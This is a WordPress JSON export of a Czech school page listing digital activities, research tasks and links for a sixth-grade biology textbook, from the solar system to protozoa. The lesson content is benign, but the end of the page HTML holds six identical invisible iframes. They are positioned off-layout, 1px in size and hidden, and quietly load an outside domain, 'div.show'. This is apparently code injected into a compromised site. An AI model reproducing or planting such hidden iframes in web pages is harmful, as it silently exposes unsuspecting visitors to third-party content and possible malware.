{"id":17264,"date":"2023-10-23T11:04:02","date_gmt":"2023-10-23T09:04:02","guid":{"rendered":"https:\/\/www.nns.cz\/blog\/?page_id=17264"},"modified":"2023-10-23T11:16:17","modified_gmt":"2023-10-23T09:16:17","slug":"prirodopis-6-1-dil","status":"publish","type":"page","link":"https:\/\/www.nns.cz\/blog\/digitalni-kompetence\/prirodopis-6-1-dil\/","title":{"rendered":"P\u0159\u00edrodopis 6, 1.&nbsp;d\u00edl (\u00davod do u\u010diva P\u0159\u00edrodopisu)"},"content":{"rendered":"<h4 style=\"text-align: right;\"><a href=\"https:\/\/www.nns.cz\/blog\/digitalni-kompetence\/\" rel=\"noopener\">zp\u011bt na v\u00fdb\u011br titulu<\/a><\/h4>\n<h3>Vyu\u017eili jste n\u011bkter\u00fd z&nbsp;n\u00e1m\u011bt\u016f ve v\u00fduce, m\u00e1te n\u00e1m\u011bty nebo p\u0159ipom\u00ednky? Kontaktujte n\u00e1s na <a href=\"mailto:digi@nns.cz\">digi@nns.cz<\/a>.<\/h3>\n<p>N\u00e1m\u011bty budou pr\u016fb\u011b\u017en\u011b aktualizov\u00e1ny a&nbsp;vylep\u0161ov\u00e1ny.<\/p>\n<h2>str. 6, Slune\u010dn\u00ed soustava<\/h2>\n<p>Rozd\u011blte se do skupin. Zamyslete se, co u\u017e v\u00edte o&nbsp;slune\u010dn\u00ed soustav\u011b (nap\u0159.&nbsp;z\u00a0u\u010diva p\u0159\u00edrodov\u011bdy na 1.\u00a0stupni), a&nbsp;sv\u00e9 poznatky zpracujte nap\u0159.&nbsp;do my\u0161lenkov\u00e9 mapy nebo prezentace a&nbsp;p\u0159edstavte je ostatn\u00edm. M\u016f\u017eete vyu\u017e\u00edt vhodn\u00e9 digit\u00e1ln\u00ed prost\u0159ed\u00ed, nap\u0159.:<br \/>\n<a href=\"https:\/\/products.aspose.app\/diagram\/cs\/mindmap\">https:\/\/products.aspose.app\/diagram\/cs\/mindmap<\/a><br \/>\n<a href=\"https:\/\/bubbl.us\/\">https:\/\/bubbl.us\/<\/a><br \/>\nMicrosoft PowerPoint<\/p>\n<p style=\"text-align: left;\">Nakonec m\u016f\u017eete zhl\u00e9dnout shrnuj\u00edc\u00ed video, nap\u0159.&nbsp;<a href=\"https:\/\/www.youtube.com\/watch?v=-kiGRSIxu0A&amp;ab_channel=ESEROCzechRepublic\">https:\/\/www.youtube.com\/watch?v=-kiGRSIxu0A&amp;ab_channel=ESEROCzechRepublic<\/a>.<\/p>\n<h2>str. 11, Fotosynt\u00e9za<\/h2>\n<p>Prozkoumejte webov\u00e9 str\u00e1nky <a href=\"https:\/\/edu.ceskatelevize.cz\/namet\/fotosynteza\">https:\/\/edu.ceskatelevize.cz\/namet\/fotosynteza<\/a>. Zhl\u00e9dn\u011bte n\u011bkter\u00e9 z\u00a0vide\u00ed, p\u0159\u00edpadn\u011b vypracujte n\u011bkter\u00fd z\u00a0pracovn\u00edch list\u016f, kter\u00e9 tam jsou k\u00a0dispozici.<\/p>\n<p>D\u011blejte si pozn\u00e1mky a&nbsp;na z\u00e1v\u011br spolu\u017e\u00e1k\u016fm p\u0159edstavte, co jste se dozv\u011bd\u011bli, co v\u00e1s zaujalo apod.<\/p>\n<p>Doporu\u010den\u00e9 aplikace:<br \/>\n<a href=\"https:\/\/products.aspose.app\/diagram\/cs\/mindmap\">https:\/\/products.aspose.app\/diagram\/cs\/mindmap<\/a><br \/>\n<a href=\"https:\/\/bubbl.us\/\">https:\/\/bubbl.us\/<\/a><br \/>\nPowerPoint<br \/>\nWord<\/p>\n<h2>str. 14, V\u00fdvoj \u017eivota<\/h2>\n<p>Na internetu vyhledejte obr\u00e1zky dinosaur\u016f, dohledejte k\u00a0nim i&nbsp;dostupn\u00e9 informace. Ve vhodn\u00e9m digit\u00e1ln\u00edm prost\u0159ed\u00ed vytvo\u0159te prezentaci o&nbsp;vybran\u00e9m druhu dinosaura, dopl\u0148te ji obr\u00e1zky z\u00a0voln\u00fdch zdroj\u016f. Dinosaura pak p\u0159edstavte ostatn\u00edm.<\/p>\n<p>Doporu\u010den\u00e9 zdroje:<br \/>\n<a href=\"https:\/\/commons.wikimedia.org\/wiki\/Main_Page\">https:\/\/commons.wikimedia.org\/wiki\/Main_Page<\/a><br \/>\n<a href=\"https:\/\/pixabay.com\/cs\/\">https:\/\/pixabay.com\/cs\/<\/a><br \/>\n<a href=\"https:\/\/www.pexels.com\/\">https:\/\/www.pexels.com\/<\/a><br \/>\n<a href=\"https:\/\/www.flickr.com\/\">https:\/\/www.flickr.com\/<\/a><\/p>\n<h2>str. 17, Rozmanitost \u017eivota na Zemi<\/h2>\n<p>Na internetu nebo v\u00a0encyklopedi\u00edch vyhledejte informace o&nbsp;fenkovi berbersk\u00e9m, velbloudovi dvouhrb\u00e9m, ch\u0159est\u00fd\u0161i z\u00e1padn\u00edm a&nbsp;molochovi ostnit\u00e9m. Zam\u011b\u0159te se zejm\u00e9na na to, jak jsou tito \u017eivo\u010dichov\u00e9 p\u0159izp\u016fsobeni k\u00a0\u017eivotu v\u00a0pou\u0161ti. K\u00a0zaznamen\u00e1n\u00ed informac\u00ed vyu\u017eijte vhodn\u00e9 digit\u00e1ln\u00ed prost\u0159ed\u00ed.<\/p>\n<p>Doporu\u010den\u00e9 zdroje:<br \/>\n<a href=\"https:\/\/safaripark.cz\/cz\/zvirata-a-expozice\/lexikon-zvirat\/fenek\">https:\/\/safaripark.cz\/cz\/zvirata-a-expozice\/lexikon-zvirat\/fenek<\/a><br \/>\n<a href=\"https:\/\/www.sokujiciplaneta.cz\/zajimavosti\/sub-mala-poustni-liska-jmenem-fenek\">https:\/\/www.sokujiciplaneta.cz\/zajimavosti\/sub-mala-poustni-liska-jmenem-fenek<\/a><br \/>\n<a href=\"https:\/\/www.biolib.cz\/cz\/taxon\/id1920\/\">https:\/\/www.biolib.cz\/cz\/taxon\/id1920\/<\/a><br \/>\n<a href=\"https:\/\/www.zoopraha.cz\/zvirata-a-expozice\/lexikon-zvirat\/184-aktualne-ze-zoo-praha\/novinky-u-zvirat?d=447-velbloud-dvouhrby&amp;start=447\">https:\/\/www.zoopraha.cz\/zvirata-a-expozice\/lexikon-zvirat\/184-aktualne-ze-zoo-praha\/novinky-u-zvirat?d=447-velbloud-dvouhrby&amp;start=447<\/a><br \/>\n<a href=\"https:\/\/www.zoozlin.eu\/velbloud-dvouhrby\/\">https:\/\/www.zoozlin.eu\/velbloud-dvouhrby\/<\/a><br \/>\n<a href=\"https:\/\/www.zoochleby.cz\/velbloud-dvouhrby-domaci-6049\/\">https:\/\/www.zoochleby.cz\/velbloud-dvouhrby-domaci-6049\/<\/a><br \/>\n<a href=\"https:\/\/www.stoplusjednicka.cz\/vodni-napajedlo-hadich-supin-jak-chrestys-sbira-vodu-v-mistech-kde-temer-zadna-neni\">https:\/\/www.stoplusjednicka.cz\/vodni-napajedlo-hadich-supin-jak-chrestys-sbira-vodu-v-mistech-kde-temer-zadna-neni<\/a><br \/>\n<a href=\"http:\/\/www.atlaszvirat.cz\/moloch-ostnity-1595\">http:\/\/www.atlaszvirat.cz\/moloch-ostnity-1595<\/a><br \/>\n<a href=\"https:\/\/zoom.iprima.cz\/priroda\/moloch-ostnity-dva-penisy\">https:\/\/zoom.iprima.cz\/priroda\/moloch-ostnity-dva-penisy<\/a><\/p>\n<h2>str. 20, Pohyb<\/h2>\n<p>Ov\u011b\u0159te si, \u017ee i&nbsp;rostliny se skute\u010dn\u011b pohybuj\u00ed. Vyu\u017e\u00edt m\u016f\u017eete rostliny, kter\u00e9 m\u00e1te ve t\u0159\u00edd\u011b nebo doma.<\/p>\n<p>Rostliny postavte k\u00a0oknu, nejl\u00e9pe na parapet. Do jejich bl\u00edzkosti um\u00edst\u011bte vhodn\u00e9 z\u00e1znamov\u00e9 za\u0159\u00edzen\u00ed (fotoapar\u00e1t, chytr\u00fd mobiln\u00ed telefon), ide\u00e1ln\u011b se stativem. M\u016f\u017eete tak zaznamenat nap\u0159.&nbsp;nat\u00e1\u010den\u00ed list\u016f ke sv\u011btlu nebo rozvit\u00ed poupat.<\/p>\n<p>N\u011bkter\u00e1 za\u0159\u00edzen\u00ed p\u0159\u00edmo umo\u017e\u0148uj\u00ed vytvo\u0159it \u010dasosb\u011brn\u00fd sn\u00edmek (timelapse). U&nbsp;jin\u00fdch je nutn\u00e9 fotografovat rostliny v\u00a0intervalech, kter\u00e9 si sami ur\u010d\u00edte \u2013 \u010dasosb\u011brn\u00e9 video z\u00a0po\u0159\u00edzen\u00fdch fotografi\u00ed pak vytvo\u0159\u00edte v\u00a0aplikaci, kter\u00e1 je k\u00a0tomu ur\u010den\u00e1, nap\u0159\u00edklad na po\u010d\u00edta\u010di.<\/p>\n<p>V\u00fdsledn\u00e9 video prezentujte ve t\u0159\u00edd\u011b.<\/p>\n<p>Doporu\u010den\u00e9 zdroje:<br \/>\n<a href=\"https:\/\/www.casosberna.cz\/jak-na-casosber\">https:\/\/www.casosberna.cz\/jak-na-casosber<\/a><br \/>\n<a href=\"https:\/\/timelapsetool.com\/cs\">https:\/\/timelapsetool.com\/cs<\/a><\/p>\n<h2>str. 25, Potravn\u00ed pyramida<\/h2>\n<p>Ve vhodn\u00e9m grafick\u00e9m editoru (nap\u0159.&nbsp;Malov\u00e1n\u00ed) vytvo\u0159te dal\u0161\u00ed p\u0159\u00edklady potravn\u00ed pyramidy. Na jej\u00ed vrchol um\u00edst\u011bte nap\u0159.&nbsp;medv\u011bda hn\u011bd\u00e9ho, medv\u011bda ledn\u00edho, vlka obecn\u00e9ho, vydru \u0159\u00ed\u010dn\u00ed, tygra ussurijsk\u00e9ho, pumu americkou, lva kapsk\u00e9ho, \u017eraloka b\u00edl\u00e9ho, sumce velk\u00e9ho, orla mo\u0159sk\u00e9ho, nebo kormor\u00e1na velk\u00e9ho.<\/p>\n<p>Informace, kter\u00e9 organismy pat\u0159\u00ed do ni\u017e\u0161\u00edch stup\u0148\u016f pyramidy, dohledejte na internetu, p\u0159\u00edpadn\u011b v\u00a0odborn\u00e9 literatu\u0159e (encyklopedi\u00edch). K\u00a0tvorb\u011b pyramidy vyu\u017eijte i&nbsp;fotografie z\u00a0voln\u00fdch zdroj\u016f nebo i\u00a0sv\u00e9 vlastn\u00ed.<\/p>\n<p>V\u00fdsledn\u00e9 pyramidy vytiskn\u011bte a&nbsp;vytvo\u0159te si z\u00a0nich v\u00fdstavku.<\/p>\n<p>Doporu\u010den\u00e9 zdroje:<br \/>\n<a href=\"https:\/\/commons.wikimedia.org\/wiki\/Main_Page\">https:\/\/commons.wikimedia.org\/wiki\/Main_Page<\/a><br \/>\n<a href=\"https:\/\/pixabay.com\/cs\/\">https:\/\/pixabay.com\/cs\/<\/a><br \/>\n<a href=\"https:\/\/www.pexels.com\/\">https:\/\/www.pexels.com\/<\/a><br \/>\n<a href=\"https:\/\/www.flickr.com\/\">https:\/\/www.flickr.com\/<\/a><\/p>\n<h2>str. 30, Bu\u0148ka<\/h2>\n<p style=\"text-align: left;\">Zhl\u00e9dn\u011bte video: <a href=\"https:\/\/www.youtube.com\/watch?v=kFbL9TBYbMI&amp;ab_channel=GARDENNATURE\">https:\/\/www.youtube.com\/watch?v=kFbL9TBYbMI&amp;ab_channel=GARDENNATURE<\/a>.<\/p>\n<p>Potom vytvo\u0159te my\u0161lenkovou mapu toho, co jste se dozv\u011bd\u011bli o&nbsp;rostlinn\u00fdch i&nbsp;\u017eivo\u010di\u0161n\u00fdch bu\u0148k\u00e1ch, co v\u00e1s zaujalo. M\u016f\u017eete vyu\u017e\u00edt vhodn\u00e9 digit\u00e1ln\u00ed prost\u0159ed\u00ed, nap\u0159.:<br \/>\n<a href=\"https:\/\/products.aspose.app\/diagram\/cs\/mindmap\">https:\/\/products.aspose.app\/diagram\/cs\/mindmap<\/a><br \/>\n<a href=\"https:\/\/bubbl.us\/\">https:\/\/bubbl.us\/<\/a><\/p>\n<p>Nakonec o&nbsp;sv\u00fdch poznatc\u00edch diskutujte.<\/p>\n<h2>str. 38, Viry<\/h2>\n<p>Ve vhodn\u00e9m digit\u00e1ln\u00edm prost\u0159ed\u00ed si vytvo\u0159te shrnut\u00ed toho, co jste se v\u00a0p\u0159\u00edrodopisu dozv\u011bd\u011bli o&nbsp;virech. Potom zhl\u00e9dn\u011bte video: <a href=\"https:\/\/www.youtube.com\/watch?v=RcPq1ApIM-s&amp;ab_channel=Otev%C5%99en%C3%A1v%C4%9Bda\">https:\/\/www.youtube.com\/watch?v=RcPq1ApIM-s&amp;ab_channel=Otev%C5%99en%C3%A1v%C4%9Bda<\/a> a&nbsp;sv\u00e9 shrnut\u00ed dopl\u0148te dal\u0161\u00edmi informacemi, kter\u00e9 jste se dozv\u011bd\u011bli. Pokud budete cht\u00edt, m\u016f\u017eete si dohledat podrobn\u011bj\u0161\u00ed informace o&nbsp;tom, co v\u00e1s zaujalo, a&nbsp;sv\u016fj z\u00e1pis doplnit i&nbsp;fotografiemi nebo obr\u00e1zky vir\u016f.<\/p>\n<p>Nakonec o&nbsp;sv\u00fdch poznatc\u00edch diskutujte.<\/p>\n<h2>str. 40, Bakterie \u2013 jednobun\u011b\u010dn\u00e9 organizmy<\/h2>\n<p>Rozd\u011blte se do skupin. Ka\u017ed\u00e1 skupina zhl\u00e9dne jedno z\u00a0n\u011bkolika vide\u00ed a&nbsp;ve zvolen\u00e9m textov\u00e9m nebo grafick\u00e9m editoru vytvo\u0159\u00ed pracovn\u00ed list, kter\u00fd bude zam\u011b\u0159en na zachycen\u00ed nejd\u016fle\u017eit\u011bj\u0161\u00edch informac\u00ed, kter\u00e9 by si m\u011bl \u010dlov\u011bk z\u00a0videa zapamatovat.<\/p>\n<p>Doporu\u010den\u00e9 zdroje:<br \/>\n<a href=\"https:\/\/www.youtube.com\/watch?v=m2JDIoVj-5M&amp;ab_channel=KCscience\">https:\/\/www.youtube.com\/watch?v=m2JDIoVj-5M&amp;ab_channel=KCscience<\/a><br \/>\n<a href=\"https:\/\/www.youtube.com\/watch?v=Tp6I82B4uhA&amp;ab_channel=GARDENNATURE\">https:\/\/www.youtube.com\/watch?v=Tp6I82B4uhA&amp;ab_channel=GARDENNATURE<\/a><\/p>\n<p>N\u00e1sledn\u011b si jednotliv\u00e9 skupiny pracovn\u00ed listy mezi sebou vym\u011bn\u00ed. Nejprve si listy prohl\u00e9dnou a&nbsp;zjist\u00ed, zda by u\u017e n\u011bco byli schopni doplnit na z\u00e1klad\u011b znalost\u00ed z\u00a0hodin p\u0159\u00edrodopisu a&nbsp;videa, pro kter\u00e9 vytv\u00e1\u0159eli sv\u016fj pracovn\u00ed list. Potom zhl\u00e9dnou dal\u0161\u00ed video a&nbsp;dokon\u010d\u00ed vypl\u0148ov\u00e1n\u00ed pracovn\u00edho listu.<\/p>\n<p>Nakonec skupiny zhodnot\u00ed jednotliv\u00e1 videa (co se z\u00a0nich dozv\u011bd\u011bli\/nedozv\u011bd\u011bli, jak\u00e1 forma jim v\u00edce vyhovovala apod.) i&nbsp;zpracov\u00e1n\u00ed pracovn\u00edch list\u016f, kter\u00e9 vypl\u0148ovali (co ocenili, co by doplnili apod.).<\/p>\n<h2>str. 42, Vyu\u017eit\u00ed bakteri\u00ed \u010dlov\u011bkem<\/h2>\n<p>Na internetu vyhledejte, jak lze v\u00a0dom\u00e1c\u00edch podm\u00ednk\u00e1ch vyrobit jogurt nebo kysan\u00e9 zel\u00ed.<\/p>\n<p>Pokud to podm\u00ednky ve \u0161kole dovol\u00ed, zkuste n\u011bkterou z\u00a0t\u011bchto potravin p\u0159ipravit. Svou pr\u00e1ci dokumentujte fotoapar\u00e1tem, videokamerou nebo chytr\u00fdm mobiln\u00edm telefonem.<\/p>\n<p>N\u00e1sledn\u011b ze z\u00edskan\u00e9ho materi\u00e1lu p\u0159ipravte report\u00e1\u017e (video, p\u0159\u00edpadn\u011b ve form\u011b prezentace fotografi\u00ed s\u00a0popisem).<\/p>\n<p>Doporu\u010den\u00e9 zdroje:<br \/>\n<a href=\"https:\/\/www.receptyprimanapadu.cz\/vareni\/mate-chut-na-husty-bily-jogurt-jak-z-reklamy-vyzkousejte-ten-domaci-podle-nasich-receptu\/\">https:\/\/www.receptyprimanapadu.cz\/vareni\/mate-chut-na-husty-bily-jogurt-jak-z-reklamy-vyzkousejte-ten-domaci-podle-nasich-receptu\/<\/a><br \/>\n<a href=\"https:\/\/www.ireceptar.cz\/vareni-a-recepty\/domaci-jogurt-bez-jogurtovace-30000519.html\">https:\/\/www.ireceptar.cz\/vareni-a-recepty\/domaci-jogurt-bez-jogurtovace-30000519.html<\/a><br \/>\n<a href=\"https:\/\/fresh.iprima.cz\/recepty\/domaci-kysane-zeli-podrobny-recept-krok-za-krokem\">https:\/\/fresh.iprima.cz\/recepty\/domaci-kysane-zeli-podrobny-recept-krok-za-krokem<\/a><br \/>\n<a href=\"https:\/\/www.cuketka.cz\/?p=1481\">https:\/\/www.cuketka.cz\/?p=1481<\/a><\/p>\n<h2>str. 43, Sinice<\/h2>\n<p>Na internetu vyhledejte, na kter\u00fdch vodn\u00edch n\u00e1dr\u017e\u00edch ve va\u0161em okol\u00ed hygienici kontroluj\u00ed kvalitu vody. Jednu z\u00a0n\u00e1dr\u017e\u00ed si vyberte a&nbsp;dohledejte k\u00a0n\u00ed data posledn\u00edch m\u011b\u0159en\u00ed a&nbsp;hodnocen\u00ed vhodnosti ke koup\u00e1n\u00ed (1\u20125). Hodnoty zapi\u0161te do tabulkov\u00e9ho editoru a&nbsp;vytvo\u0159te z\u00a0nich spojnicov\u00fd graf.<\/p>\n<p>Doporu\u010den\u00e9 zdroje:<br \/>\n<a href=\"https:\/\/szu.cz\/temata-zdravi-a-bezpecnosti\/zivotni-prostredi\/kvalita-vody\/koupaliste-a-bazeny\/koupani-ve-volne-prirode\/rizika-pri-koupani-ve-volne-prirode\/sinice-a-koupani-v-prirode\/\">https:\/\/szu.cz\/temata-zdravi-a-bezpecnosti\/zivotni-prostredi\/kvalita-vody\/koupaliste-a-bazeny\/koupani-ve-volne-prirode\/rizika-pri-koupani-ve-volne-prirode\/sinice-a-koupani-v-prirode\/<\/a><br \/>\n<a href=\"https:\/\/www.koupacivody.cz\/\">https:\/\/www.koupacivody.cz\/<\/a><\/p>\n<h2>str. 49, Pl\u00edsn\u011b<\/h2>\n<p>V\u00a0textov\u00e9m editoru si zapi\u0161te n\u00e1sleduj\u00edc\u00ed ot\u00e1zky:<\/p>\n<p>Jak\u00e9 pl\u00edsn\u011b se pro v\u00fdrobu s\u00fdr\u016f pou\u017e\u00edvaj\u00ed?<br \/>\nJak\u00e9 kultury se pou\u017e\u00edvaj\u00ed p\u0159i&nbsp;v\u00fdrob\u011b s\u00fdr\u016f, nejen pl\u00eds\u0148ov\u00fdch?<br \/>\nCo je nezbytnou podm\u00ednkou k\u00a0tomu, aby se pl\u00edse\u0148 na s\u00fdru vytvo\u0159ila?<br \/>\nJsou pl\u00eds\u0148ov\u00e9 s\u00fdry zdravotn\u011b z\u00e1vadn\u00e9?<\/p>\n<p>Najd\u011bte odpov\u011bdi na tyto ot\u00e1zky, vyu\u017eijte k\u00a0tomu internet. Odpov\u011bdi pak dopl\u0148te do sv\u00e9ho souboru. Odli\u0161te je od ot\u00e1zek nap\u0159.&nbsp;jin\u00fdm \u0159ezem nebo jinou barvou p\u00edsma.<\/p>\n<p>Odpov\u011bdi si pak spole\u010dn\u011b zkontrolujte, m\u016f\u017eete k\u00a0tomu vyu\u017e\u00edt i&nbsp;n\u00e1sleduj\u00edc\u00ed videa:<br \/>\n<a href=\"https:\/\/www.youtube.com\/watch?v=f4aBE4BTKoA&amp;ab_channel=Madeta\">https:\/\/www.youtube.com\/watch?v=f4aBE4BTKoA&amp;ab_channel=Madeta<\/a><br \/>\n<a href=\"https:\/\/www.stream.cz\/jidlo-s-r-o\/hermelin-tajemstvi-vyroby-krale-syru-236757\">https:\/\/www.stream.cz\/jidlo-s-r-o\/hermelin-tajemstvi-vyroby-krale-syru-236757<\/a><\/p>\n<h2>str. 50, Houby<\/h2>\n<p>a) P\u0159i&nbsp;proch\u00e1zce v\u00a0p\u0159\u00edrod\u011b fotografujte houby, kter\u00e9 uvid\u00edte \u2013 jedl\u00e9, nejedl\u00e9 i&nbsp;jedovat\u00e9, nezapome\u0148te ani na houby d\u0159evokazn\u00e9. Potom se za pomoci atlasu hub pokuste ur\u010dit jejich druhy a&nbsp;z\u00a0fotografi\u00ed vytvo\u0159te prezentaci, kterou p\u0159edstav\u00edte spolu\u017e\u00e1k\u016fm ve t\u0159\u00edd\u011b.<\/p>\n<p>Nakonec m\u016f\u017eete vytvo\u0159it sv\u00e9 t\u0159\u00eddn\u00ed fotoalbum.<\/p>\n<p><em>Pozn\u00e1mka pro vyu\u010duj\u00edc\u00ed: S\u00a0fotografov\u00e1n\u00edm je vhodn\u00e9 za\u010d\u00edt u\u017e na za\u010d\u00e1tku \u0161koln\u00edho roku.<\/em><\/p>\n<p>Doporu\u010den\u00e9 zdroje:<br \/>\n<a href=\"https:\/\/www.nahoubach.cz\/atlas-hub\/\">https:\/\/www.nahoubach.cz\/atlas-hub\/<\/a><br \/>\n<a href=\"https:\/\/play.google.com\/store\/apps\/details?id=bazinac.aplikacenahouby&amp;hl=cs&amp;gl=US&amp;pli=1\">https:\/\/play.google.com\/store\/apps\/details?id=bazinac.aplikacenahouby&amp;hl=cs&amp;gl=US&amp;pli=1<\/a><br \/>\n<a href=\"https:\/\/www.myko.cz\/myko-atlas\/\">https:\/\/www.myko.cz\/myko-atlas\/<\/a><\/p>\n<p>b) Z\u00a0fotografov\u00e1n\u00ed hub si ud\u011blejte sout\u011b\u017e. Ka\u017ed\u00fd \u017e\u00e1k (lze pracovat i&nbsp;nap\u0159.&nbsp;ve dvojic\u00edch) si vybere jeden druh houby a&nbsp;jeho z\u00e1stupce bude fotografovat v\u00a0p\u0159irozen\u00e9m prost\u0159ed\u00ed. Z\u00e1rove\u0148 si i\u00a0bude zapisovat, kde a&nbsp;kdy kterou houbu na\u0161el, co rostlo v\u00a0okol\u00ed apod. K\u00a0tomu m\u016f\u017ee vyu\u017e\u00edt tabulkov\u00fd editor.<\/p>\n<p>Nakonec vyhodnot\u00ed z\u00edskan\u00e1 data. Zejm\u00e9na po\u010det hub, kter\u00e9 na\u0161el, ale data m\u016f\u017ee t\u0159\u00eddit i&nbsp;podle jin\u00fdch krit\u00e9ri\u00ed. M\u016f\u017ee vytvo\u0159it i&nbsp;graf zn\u00e1zor\u0148uj\u00edc\u00ed prost\u0159ed\u00ed, ve kter\u00e9m se houby nach\u00e1zej\u00ed, nebo graf, kolik hub na\u0161el v\u00a0jednotliv\u00fdch dnech.<\/p>\n<p>Vyhr\u00e1v\u00e1 ten druh houby, kter\u00fd je nejhojn\u011bj\u0161\u00ed.<\/p>\n<h2>str. 56, V\u00fdznam li\u0161ejn\u00edk\u016f<\/h2>\n<p>Zamyslete se, k\u00a0\u010demu m\u016f\u017ee \u010dlov\u011bk pou\u017e\u00edvat li\u0161ejn\u00edky. Sv\u00e9 n\u00e1pady si zaznamenejte (vyu\u017eijte k\u00a0tomu vhodn\u00e9 digit\u00e1ln\u00ed prost\u0159ed\u00ed).<\/p>\n<p>Potom na internetu vyhledejte li\u0161ejn\u00edky a&nbsp;sv\u016fj z\u00e1pis o&nbsp;jejich v\u00fdznamu pro \u010dlov\u011bka upravte podle toho, co jste dohledali.<\/p>\n<p>Doporu\u010den\u00e9 zdroje:<br \/>\n<a href=\"https:\/\/temata.rozhlas.cz\/lisejniky-7856238\">https:\/\/temata.rozhlas.cz\/lisejniky-7856238<\/a><br \/>\n<a href=\"https:\/\/ekolist.cz\/cz\/publicistika\/priroda\/jak-lisejniky-udrzovaly-suche-prdylky-nemluvnat\">https:\/\/ekolist.cz\/cz\/publicistika\/priroda\/jak-lisejniky-udrzovaly-suche-prdylky-nemluvnat<\/a><\/p>\n<h2>str. 58, Prvoci<\/h2>\n<p>Prove\u010fte laboratorn\u00ed pr\u00e1ci ze str.&nbsp;64. Vypracujte z\u00a0n\u00ed laboratorn\u00ed protokol, m\u016f\u017eete vyu\u017e\u00edt vhodn\u00e9 digit\u00e1ln\u00ed prost\u0159ed\u00ed.<\/p>\n<p style=\"text-align: left;\">Potom zhl\u00e9dn\u011bte video: <a href=\"https:\/\/www.youtube.com\/watch?v=1nPDyzgj2eg&amp;ab_channel=GARDENNATURE\">https:\/\/www.youtube.com\/watch?v=1nPDyzgj2eg&amp;ab_channel=GARDENNATURE<\/a>.<\/p>\n<p>Sv\u00e9 pozorov\u00e1n\u00ed porovnejte s\u00a0pozorov\u00e1n\u00edm zm\u00edn\u011bn\u00fdm ve videu.<\/p>\n<p>&nbsp;<\/p>\n<h4 style=\"text-align: right;\"><a href=\"https:\/\/www.nns.cz\/blog\/digitalni-kompetence\/\" rel=\"noopener\">zp\u011bt na v\u00fdb\u011br titulu<\/a><\/h4>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>zp\u011bt na v\u00fdb\u011br titulu Vyu\u017eili jste n\u011bkter\u00fd z&nbsp;n\u00e1m\u011bt\u016f ve v\u00fduce, m\u00e1te n\u00e1m\u011bty nebo p\u0159ipom\u00ednky? Kontaktujte n\u00e1s na digi@nns.cz. N\u00e1m\u011bty budou pr\u016fb\u011b\u017en\u011b aktualizov\u00e1ny a&nbsp;vylep\u0161ov\u00e1ny. str.&nbsp;6, Slune\u010dn\u00ed soustava Rozd\u011blte se do skupin. Zamyslete se, co u\u017e v\u00edte o&nbsp;slune\u010dn\u00ed soustav\u011b (nap\u0159.&nbsp;z\u00a0u\u010diva p\u0159\u00edrodov\u011bdy na 1.\u00a0stupni), a&nbsp;sv\u00e9 poznatky zpracujte nap\u0159.&nbsp;do my\u0161lenkov\u00e9 mapy nebo prezentace a&nbsp;p\u0159edstavte je ostatn\u00edm. M\u016f\u017eete vyu\u017e\u00edt [&hellip;]<\/p>\n","protected":false},"author":12,"featured_media":0,"parent":15791,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-17264","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/17264","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/comments?post=17264"}],"version-history":[{"count":3,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/17264\/revisions"}],"predecessor-version":[{"id":17268,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/17264\/revisions\/17268"}],"up":[{"embeddable":true,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/15791"}],"wp:attachment":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/media?parent=17264"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}